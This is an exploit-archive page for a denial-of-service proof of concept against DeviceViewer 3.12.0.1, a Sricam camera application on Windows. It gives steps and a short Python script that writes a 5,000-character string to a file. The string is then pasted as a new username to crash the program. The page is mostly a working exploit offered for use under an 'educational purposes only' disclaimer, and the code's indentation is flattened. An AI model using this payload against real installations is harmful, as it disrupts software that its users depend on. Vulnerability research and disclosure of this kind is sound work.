Deviceviewer 3.12.0.1 creating user denial of service Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-09-24 |
Type : dos |
Platform : windows
This exploit / vulnerability Deviceviewer 3.12.0.1 creating user denial of service is for educational purposes only and if it is used you will do on your own risk!
# Steps to reproduce:
# 1. Generate a malicious payload via the POC
# 2. In the Sricam application create a new user
# 3. When creating a new user, set the username as the malicious payload
# 4. Observe a program DOScrash
payload = "A" * 5000
try:
evilCreate =open("exploit.txt","w")
print("""
DeviceViewer 3.12.0.1 DOS exploit POC
Author: Nu11pwn
""")
print("[x] Creating malicious file")
evilCreate.write(payload)
evilCreate.close()
print("[x] Malicious file create")
print("[x] When creating a new user, set the username to the file contents")
print("[x] Watch the program crash")
except:
print("[!] File failed to be created")
Deviceviewer 3.12.0.1 creating user denial of service